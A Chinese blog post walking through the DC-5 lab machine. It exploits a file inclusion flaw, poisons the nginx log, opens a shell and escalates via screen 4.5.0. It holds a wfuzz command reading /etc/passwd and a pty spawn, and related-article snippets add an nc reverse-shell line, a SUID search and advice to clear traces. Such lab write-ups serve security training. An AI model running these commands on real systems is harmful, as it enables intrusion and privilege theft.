【DC系列05】DC-5靶机复盘

最新推荐文章于 2024-05-27 19:29:30 发布
最新推荐文章于 2024-05-27 19:29:30 发布
阅读量127 收藏
点赞数
分类专栏: 打靶机系列 文章标签: 安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131623754
版权

【DC系列05】DC-5靶机复盘

首先对靶机进行一个ip扫描。

image-20230704200000200

打开网站后点击Contact,在下面随便提交点东西。

image-20230709154602657

提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。

image-20230709154618728

所以我们来扫一下这个关键目录。

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.102.143/thankyou.php?FUZZ=/etc/passwd

image-20230704200602700

image-20230704200546390

利用指纹识别可以发现这是个nginx服务器。

image-20230709154816000

尝试查看一下nginx的日志文件,发现是可以查看的,并且里面有一些登陆记录。

image-20230704195933873

用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。

image-20230704201658648

利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。

image-20230704201847331

发现成功拿到shell。

image-20230704202020317

搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。

image-20230704202010439

发现有两个可以利用的漏洞文件。

image-20230704202540801

使用python先美化一下终端,

python -c "import pty;pty.spawn('/bin/bash')"

然后我们进入/tmp目录。

把漏洞文件下载到靶机中给添加一个执行权限。

执行后发现成功拿到root权限。

image-20230704202639569

dumplings。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
【Vulnhub靶机DC-5(suid提权)
过期的秋刀鱼
08-06 292
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析footer.php,有文件包含漏洞木马上传,查看日志反弹shellpython交互shell提权 find / -user root -perm /4000 2 > /dev/nulllibhax.c和rootshell.c文件的编译 run.sh bash ./run.sh 提权
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5562
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
05-27 716
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
DC-5靶机渗透测试
读书 买花 长大
03-14 1329
DC-5
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2218
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-5靶机
Flamingo1998的博客
02-22 177
DC-5靶机
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6349
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC5靶机
qq_40646572的博客
05-04 310
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC系列5靶机实战
qq_43462485的博客
10-28 601
DC-5靶机实战 攻击机:kali 192.168.43.16 目标机:dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现,然后使用nmap进行端口扫描 2.发现开放80端口的web服务,溜了一圈没找到什么信息,还是参考了一下大佬的思路 发现提交contact信息后每次刷新thank you的界面下面的数值都会变化,第一次遇到这种类型 参考大佬后发现可能是LFI(本地文件包含)漏洞 3.通过burp抓包,对参数进行
【Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权
Pluto.的博客
12-29 1573
文章目录Vulnhub靶机渗透测试之DC-51. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试之DC-5 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 2. 漏洞利用 3. 提权 ...
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 150
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
vulnhub之DC5靶机
LainWith的博客
08-15 581
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC-5靶机渗透
weixin_45349299的博客
02-13 188
kali攻击机:192.168.235.130。
Vulnhub靶机渗透学习——DC-5
qq_45612828的博客
10-21 129
wfuzz 文件包含参数文件包含 nginx 日志文件 getshell 方式screen4.5.0 版本进行提权操作。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值